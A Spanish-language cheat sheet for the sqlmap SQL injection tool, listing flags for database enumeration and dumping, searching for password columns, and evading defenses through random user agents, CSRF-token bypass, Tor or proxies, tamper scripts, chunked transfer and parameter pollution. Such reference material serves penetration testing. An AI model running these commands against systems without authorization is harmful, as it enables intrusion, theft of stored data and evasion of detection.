# Ejecución de sqlmap general desde request guardado en archivosqlmap-rrequest.txt--level=5--risk=3--random-agent--threads=10--batch--flush-session--hostname
Parámetros principales
-u"<URL>"--user-agent='<user-agent>'--cookie='<cookie>'--header='<header>'--level=<1-5># default 1--risk=<1-3># default 1--technique=<technique># default "BEUSTQ"--skip-waf# omitir prueba heurÃstica de WAF--batch# no espera respuesta del usuario, utiliza comportamiento por defecto--flush-session# limpia sesión--threads=10--dump-all--exclude-sysdbs# obtener la información de todas las bases de datos
# Mostrar mensajes de error de DBMS--parse-errors# Almacenar todo el tráfico en un archivo de texto-t/tmp/sqlmap-traffic.txt# Nivel de detalle de los mensajes de salida-v<0-6>so
# Obtener estructura completa del DBMS--schema# Buscar tablas por nombre--search-T<table-name>--search-Tuser# Buscar columnas por nombre--search-C<column-name>--search-Cpass# Proceso completo de enumeración--all--batch
Bypass de protecciones
# Bypass de lista negra de HTTP User-Agent--random-agent# Bypass de token anti-CSRF--csrf-token="<token-parameter-name>"# Bypass de valor único--randomize=<parameter-name># Bypass de parámetro calculado--eval="<python-code>"--eval="import hashlib;id2=hashlib.md5(id).hexdigest()"# Ocultar dirección IP--proxy--proxy-file--tor--check-tor# Manipulación y ofuscación de payloads--tamper="<script>"# Transferencia fragmentada--chunked# HTTP parameter pollution (HPP)--hpp
DataBase Management System (DBMS)
sqlmap-u"http://<target>/"--dbms=<dbms>
-u = URL.
<target> = objetivo.
--dbms = DataBase Management System, por ejemplo: mysql, mssql, postgresql, oracle, ibmdb2, etc.